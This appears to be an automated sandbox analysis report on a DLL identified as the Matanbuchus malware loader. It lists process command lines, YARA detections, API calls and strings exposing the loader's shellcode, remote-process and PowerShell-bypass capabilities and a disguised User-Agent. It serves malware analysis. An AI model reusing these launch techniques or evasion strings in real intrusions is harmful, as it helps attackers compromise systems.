                        Commandline:loaddll32.exe "C:\Users\user\Desktop\file.dll"
                        Imagebase:0x320000
                        File size:126'464 bytes
                        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:2
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                        Imagebase:0x1c0000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:3
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000003.00000002.2210377846.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:00:01:56
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:false

                        Target ID:7
                        Start time:00:01:59
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,Export
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:00:02:01
                        Start date:16/01/2025
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0x7ff6caf60000
                        File size:25'088 bytes
                        MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:00:02:01
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit):true
                        Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0xd80000
                        File size:20'992 bytes
                        MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        Target ID:10
                        Start time:00:02:02
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,Main
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:11
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Export
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:13
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Main
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:14
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:15
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:16
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
                        Imagebase:0x7ff66e660000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:17
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:18
                        Start time:00:02:05
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",UnregisterDll
                        Imagebase:0x7a0000
                        File size:61'440 bytes
                        MD5 hash:889B99C52A60DD49227C5E485A016679
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:21
                        Start time:00:02:06
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624
                        Imagebase:0xa60000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:26
                        Start time:00:03:00
                        Start date:16/01/2025
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0x7ff6caf60000
                        File size:25'088 bytes
                        MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:27
                        Start time:00:03:00
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit):true
                        Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0xd80000
                        File size:20'992 bytes
                        MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        Has exited:true

                        Target ID:28
                        Start time:00:04:00
                        Start date:16/01/2025
                        Path:C:\Windows\System32\regsvr32.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0x7ff6caf60000
                        File size:25'088 bytes
                        MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Target ID:29
                        Start time:00:04:00
                        Start date:16/01/2025
                        Path:C:\Windows\SysWOW64\regsvr32.exe
                        Wow64 process (32bit):true
                        Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd"
                        Imagebase:0xd80000
                        File size:20'992 bytes
                        MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false


                          Execution Graph

                          Execution Coverage:1%
                          Dynamic/Decrypted Code Coverage:79.2%
                          Signature Coverage:46.5%
                          Total number of Nodes:101
                          Total number of Limit Nodes:2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                          • PathIsDirectoryW.SHLWAPI(?), ref: 7EF2346D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryPath
                          • String ID:
                          • API String ID: 1580926078-0
                          • Opcode ID: bf1bc74431eba1dd0ce361fecfd5d007c7911795e9097ea6343043ab206bce54
                          • Instruction ID: 53824d59138f5d857152227a3b5a9010c971335db77ea8d8530e77c39db84e68
                          • Opcode Fuzzy Hash: bf1bc74431eba1dd0ce361fecfd5d007c7911795e9097ea6343043ab206bce54
                          • Instruction Fuzzy Hash: 88727A78E05269CBDB69CF58C990BDDBBB1BF89304F1081EAD849A7345D730AA85CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          APIs
                            • Part of subcall function 7EF23490: __aullrem.LIBCMT ref: 7EF234E5
                            • Part of subcall function 7EF17920: CreateMutexA.KERNEL32(00000000,00000001,7EF4B249,?,?,7EF4B249,?), ref: 7EF1792C
                          • ExitProcess.KERNEL32 ref: 7EF4B252
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateExitMutexProcess__aullrem
                          • String ID:
                          • API String ID: 1029110445-0
                          • Opcode ID: 585f7e072baeb3186479d2a99c1aefe3792052cf2d9243800b08dc924792d253
                          • Instruction ID: 3b126db3b5785efe1d144964d5fd359c6bfc4c98bf20f633153cd7e8c829065d
                          • Opcode Fuzzy Hash: 585f7e072baeb3186479d2a99c1aefe3792052cf2d9243800b08dc924792d253
                          • Instruction Fuzzy Hash: 9202B1B8E04259DFDB14CF99C890BEDBBB2BF89304F10819AD819A7755D730AA85CF50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 29 7ef17920-7ef17939 CreateMutexA 30 7ef1793b-7ef1793d 29->30 31 7ef1793f-7ef1794a GetLastError 29->31 32 7ef1795f-7ef17962 30->32 33 7ef1795a 31->33 34 7ef1794c-7ef17958 CloseHandle 31->34 33->32 34->32
                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,7EF4B249,?,?,7EF4B249,?), ref: 7EF1792C
                          • GetLastError.KERNEL32(?,?,7EF4B249), ref: 7EF1793F
                          • CloseHandle.KERNEL32(00000000,?,?,7EF4B249), ref: 7EF17950
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateErrorHandleLastMutex
                          • String ID:
                          • API String ID: 4294037311-0
                          • Opcode ID: 437136c6e1f79b0e280a3f3faad2e6c2c3ecbe9000503b55f180c822fca5219a
                          • Instruction ID: b903ca2c22f7542ebc5aaad78bc3ff8a01b2535a948ce5c8172aa61916dd27b8
                          • Opcode Fuzzy Hash: 437136c6e1f79b0e280a3f3faad2e6c2c3ecbe9000503b55f180c822fca5219a
                          • Instruction Fuzzy Hash: 5CE0DF7A61820EFFD700ABA5C828B4D37BAEB4A311F900854F90FD79C0F6758E448B61

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 180 6cc510e0-6cc51113 call 6cc51120 CreateThread
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,6CC53A50,00000000,6CC6BEBC,?,?,?,6CC6BEBC,00000000,00000000,6CC53A50,00000000,00000000,00000000), ref: 6CC5110E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210625828.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000003.00000002.2210605097.000000006CC50000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210655307.000000006CC83000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210672778.000000006CC91000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210777648.000000006CF27000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210910682.000000006D0F9000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2210926789.000000006D0FB000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: f63af93a669a942de1f5ae3a2043a18d49d354450eca9fad240067c5be96da76
                          • Instruction ID: 99e22695e0263dee8e255a69c831648d62181b2f508f1cf227a4b5e4913b25e9
                          • Opcode Fuzzy Hash: f63af93a669a942de1f5ae3a2043a18d49d354450eca9fad240067c5be96da76
                          • Instruction Fuzzy Hash: 8CF04EB4604209AF8748DF99D890D9BB7B9EF8D350B108299BC19C7350DA31E921CBA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: Dll launch(Regsvr32)$Dll launch(RunDll32)$ExecuteDllRemoteProcessMemory$ExecuteRemoteProcessMemory$Install MSI Package$Launch command CMD$Launch command PS$Launch console exe$Launch exe$Launch with privileges$Loader bin shellCode$Loader bin shellCode #2$PeLoader Dll & EXE$PeLoader Dll Start$PeLoader Dll dllregisterserver$TPd$VQmR$cKC$paU$}
                          • API String ID: 2807920213-484686173
                          • Opcode ID: e7fb9bf7739274294c8fb881eb76ab9ad669c640310a6cb55279103a1f2cd14c
                          • Instruction ID: 70caca8d0e926edb2ec3472326d03ea1dc1c9b6d5ddfba43360799a283c9fef7
                          • Opcode Fuzzy Hash: e7fb9bf7739274294c8fb881eb76ab9ad669c640310a6cb55279103a1f2cd14c
                          • Instruction Fuzzy Hash: D46369B5D05258DACF10EFB8CD55BDEBBB4AB49300F5086CED00DA7681EA345B849F92
                          APIs
                            • Part of subcall function 7EEF3EA0: std::ios_base::clear.LIBCPMTD ref: 7EEF430A
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7EF454BB
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7EF45507
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Ios_base_dtorstd::ios_base::_$std::ios_base::clear
                          • String ID: $Microsoft-WNS/10.0$POST$User-Agent: Microsoft-WNS/10.0Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CA$}>
                          • API String ID: 4121727721-2552320425
                          • Opcode ID: d86564d3196835405a4a271687f71fddc5a521cc2aefccc10c5bd6e035821338
                          • Instruction ID: 3783de1bf695792711c1fe80bca41374bef8ac178c83ba59e57fee2edd2851c6
                          • Opcode Fuzzy Hash: d86564d3196835405a4a271687f71fddc5a521cc2aefccc10c5bd6e035821338
                          • Instruction Fuzzy Hash: C7837D78E05269CFDB65CF18C9A0B99BBB1BB89304F1081DAD84DA7345DB31AE85CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +$/$9$Z$i$j$p$v
                          • API String ID: 0-930883352
                          • Opcode ID: 7c04b7466646c7d6eee6ce41d1066afcb718d3f62b0b7957e220ef7f92e70d1b
                          • Instruction ID: 18017caf1ac9e280d3942e453c96e2212cbb527d32ed103e94b6c76f9c30b86d
                          • Opcode Fuzzy Hash: 7c04b7466646c7d6eee6ce41d1066afcb718d3f62b0b7957e220ef7f92e70d1b
                          • Instruction Fuzzy Hash: 93A2E234A14269CADB25CF64D8507DEB7B2EF99300F1080E9D40DAB3A0EB755E85CF56
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J$C:\Windows\System32\cmd.exe /c $D$e$e$e$e
                          APIs
                          • GetLocaleInfoW.KERNEL32(?,2000000B,7EF67A08,00000002,00000000,?,?,?,7EF67A08,?,00000000), ref: 7EF67783
                          • GetLocaleInfoW.KERNEL32(?,20001004,7EF67A08,00000002,00000000,?,?,?,7EF67A08,?,00000000), ref: 7EF677AC
                          • GetACP.KERNEL32(?,?,7EF67A08,?,00000000), ref: 7EF677C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: FstL$L$wAcH$xeCcjS$yiiUXY
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7EF679CB
                          • IsValidCodePage.KERNEL32(00000000), ref: 7EF67A14
                          • IsValidLocale.KERNEL32(?,00000001), ref: 7EF67A23
                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7EF67A6B
                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7EF67A8A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                          • String ID:
                          APIs
                            • Part of subcall function 7EF5EB5C: GetLastError.KERNEL32(?,00000008,7EF6360A), ref: 7EF5EB60
                            • Part of subcall function 7EF5EB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7EF5EC02
                          • GetACP.KERNEL32(?,?,?,?,?,?,7EF5F5A2,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 7EF6701C
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7EF5F5A2,?,?,?,00000055,?,-00000050,?,?), ref: 7EF67047
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7EF671AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CodeInfoLocalePageValid
                          • String ID: utf8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |J$" -ExecutionPolicy Bypass -Command "$D$e$e
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #$$$8$n${
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '$N/A$R$S$l
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strrchr
                          • String ID:
